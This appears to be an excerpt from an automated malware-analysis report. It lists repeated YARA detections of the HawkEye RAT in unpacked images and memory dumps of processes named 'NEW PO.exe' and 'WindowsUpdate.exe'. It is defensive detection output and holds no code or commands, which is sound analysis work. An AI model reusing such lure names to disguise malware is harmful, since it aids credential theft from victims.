Source: 18.0.WindowsUpdate.exe.409c0d.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.409c0d.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.45fa72.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.45fa72.14.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.45fa72.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.45fa72.9.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.45fa72.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.45fa72.17.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.408208.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.408208.17.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.WindowsUpdate.exe.45fa72.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.WindowsUpdate.exe.45fa72.17.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.408208.40.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.408208.40.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.408208.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.408208.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.409c0d.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.409c0d.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.45fa72.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.45fa72.14.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.WindowsUpdate.exe.45fa72.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.WindowsUpdate.exe.45fa72.12.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.WindowsUpdate.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.WindowsUpdate.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.409c0d.39.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.409c0d.39.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.409c0d.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.409c0d.27.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.409c0d.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.409c0d.22.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.NEW PO.exe.409c0d.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.NEW PO.exe.409c0d.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.WindowsUpdate.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.WindowsUpdate.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.45fa72.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.45fa72.23.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.409c0d.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.409c0d.12.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.WindowsUpdate.exe.408208.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.WindowsUpdate.exe.408208.23.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.408208.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.408208.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.400000.26.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.400000.26.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.NEW PO.exe.474fbd0.5.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.NEW PO.exe.474fbd0.5.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.WindowsUpdate.exe.45fa72.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.WindowsUpdate.exe.45fa72.22.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.45fa72.38.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.45fa72.38.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.WindowsUpdate.exe.408208.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.WindowsUpdate.exe.408208.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.45fa72.40.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.45fa72.40.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.WindowsUpdate.exe.409c0d.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.2.WindowsUpdate.exe.409c0d.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.WindowsUpdate.exe.409c0d.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.WindowsUpdate.exe.409c0d.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.409c0d.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.45fa72.29.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.45fa72.29.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.409c0d.19.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.WindowsUpdate.exe.45fa72.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.WindowsUpdate.exe.45fa72.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.409c0d.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.409c0d.23.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.WindowsUpdate.exe.408208.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.2.WindowsUpdate.exe.408208.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.409c0d.39.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.409c0d.39.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.409c0d.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.409c0d.12.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.400000.16.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.400000.16.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.400000.38.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.400000.38.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.WindowsUpdate.exe.409c0d.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.WindowsUpdate.exe.409c0d.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.WindowsUpdate.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.WindowsUpdate.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.WindowsUpdate.exe.459fbd0.4.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.WindowsUpdate.exe.459fbd0.4.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.408208.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.408208.13.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.408208.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.408208.13.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.45fa72.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.45fa72.19.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.NEW PO.exe.408208.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.NEW PO.exe.408208.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.WindowsUpdate.exe.408208.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.WindowsUpdate.exe.408208.9.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.45fa72.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.45fa72.24.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.408208.28.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.408208.28.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.WindowsUpdate.exe.409c0d.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.WindowsUpdate.exe.409c0d.14.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.NEW PO.exe.45fa72.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.NEW PO.exe.45fa72.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.WindowsUpdate.exe.45fa72.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.WindowsUpdate.exe.45fa72.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.409c0d.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.409c0d.18.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.408208.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.408208.24.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.400000.37.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.400000.37.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.409c0d.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.409c0d.27.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.WindowsUpdate.exe.408208.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.WindowsUpdate.exe.408208.13.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.408208.28.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.408208.28.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.WindowsUpdate.exe.459fbd0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.WindowsUpdate.exe.459fbd0.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.408208.41.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.408208.41.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.400000.16.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.400000.16.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.WindowsUpdate.exe.45fa72.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.2.WindowsUpdate.exe.45fa72.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.408208.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.408208.22.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.WindowsUpdate.exe.402fbd0.5.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 15.2.WindowsUpdate.exe.402fbd0.5.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.WindowsUpdate.exe.409c0d.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.WindowsUpdate.exe.409c0d.19.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.WindowsUpdate.exe.45fa72.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.0.WindowsUpdate.exe.45fa72.9.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.WindowsUpdate.exe.400000.16.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.WindowsUpdate.exe.400000.16.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.45fa72.29.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.45fa72.29.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.408208.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.408208.18.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.NEW PO.exe.400000.26.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.NEW PO.exe.400000.26.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.WindowsUpdate.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.WindowsUpdate.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.NEW PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.NEW PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.WindowsUpdate.exe.409c0d.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.WindowsUpdate.exe.409c0d.24.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.WindowsUpdate.exe.408208.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.WindowsUpdate.exe.408208.18.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.NEW PO.exe.474fbd0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.NEW PO.exe.474fbd0.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.WindowsUpdate.exe.402fbd0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 15.2.WindowsUpdate.exe.402fbd0.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.NEW PO.exe.43c56d8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.NEW PO.exe.43c56d8.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.WindowsUpdate.exe.3e88750.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 15.2.WindowsUpdate.exe.3e88750.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.NEW PO.exe.45a8750.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.NEW PO.exe.45a8750.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.WindowsUpdate.exe.43f8750.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.WindowsUpdate.exe.43f8750.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.WindowsUpdate.exe.3ca56d8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 15.2.WindowsUpdate.exe.3ca56d8.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.WindowsUpdate.exe.42156d8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.WindowsUpdate.exe.42156d8.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.391647562.000000000358E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.400119443.000000000359A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
